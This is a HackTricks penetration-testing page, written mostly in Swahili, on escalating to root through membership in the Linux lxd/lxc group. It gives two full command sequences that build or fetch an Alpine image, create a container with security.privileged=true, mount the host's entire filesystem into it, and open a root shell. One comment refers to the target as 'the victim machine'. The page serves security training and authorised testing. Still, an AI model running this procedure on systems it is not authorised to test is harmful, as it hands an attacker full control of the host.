HackTrickslxd/lxc Group - Privilege escalation
Reading time: 4 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Ikiwa unahusishwa na lxd au lxc group, unaweza kuwa root
Kutumia bila mtandao
Method 1
Unaweza kupakua picha ya alpine kutumia na lxd kutoka kwenye hazina inayotegemewa. Canonical inachapisha toleo la kila siku kwenye tovuti yao: https://images.lxd.canonical.com/images/alpine/3.18/amd64/default/ Chukua lxd.tar.xz na rootfs.squashfs kutoka kwenye toleo jipya zaidi. (Jina la saraka ni tarehe).
Vinginevyo, unaweza kufunga kwenye mashine yako mjenzi wa distro hii: https://github.com/lxc/distrobuilder (fuata maelekezo ya github):
# Install requirements
sudo apt update
sudo apt install -y golang-go gcc debootstrap rsync gpg squashfs-tools git make build-essential libwin-hivex-perl wimtools genisoimage
# Clone repo
mkdir -p $HOME/go/src/github.com/lxc/
cd $HOME/go/src/github.com/lxc/
git clone https://github.com/lxc/distrobuilder
# Make distrobuilder
cd ./distrobuilder
make
# Prepare the creation of alpine
mkdir -p $HOME/ContainerImages/alpine/
cd $HOME/ContainerImages/alpine/
wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
# Create the container - Beware of architecture while compiling locally.
sudo $HOME/go/bin/distrobuilder build-incus alpine.yaml -o image.release=3.18 -o image.architecture=x86_64
Pakia faili incus.tar.xz (lxd.tar.xz ikiwa umepakua kutoka kwenye hifadhi ya Canonical) na rootfs.squashfs, ongeza picha kwenye repo na uunde kontena:
lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
# Check the image is there
lxc image list
# Create the container
lxc init alpine privesc -c security.privileged=true
# List containers
lxc list
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
caution
Ikiwa unakutana na kosa hili Kosa: Hakuna hifadhi ya kuhifadhi iliyopatikana. Tafadhali tengeneza hifadhi mpya ya kuhifadhi
Kimbia lxd init na uweke chaguo zote kuwa za kawaida. Kisha rudia kipande cha amri kilichopita
Hatimaye unaweza kutekeleza kontena na kupata root:
lxc start privesc
lxc exec privesc /bin/sh
[email protected]:~# cd /mnt/root #Here is where the filesystem is mounted
Method 2
Jenga picha ya Alpine na uanze kutumia bendera security.privileged=true, ukilazimisha kontena kuingiliana kama root na mfumo wa faili wa mwenyeji.
# build a simple alpine image
git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
sudo ./build-alpine -a i686
# import the image
lxc image import ./alpine*.tar.gz --alias myimage # It's important doing this from YOUR HOME directory on the victim machine, or it might fail.
# before running the image, start and configure the lxd storage pool as default
lxd init
# run the image
lxc init myimage mycontainer -c security.privileged=true
# mount the /root into the image
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.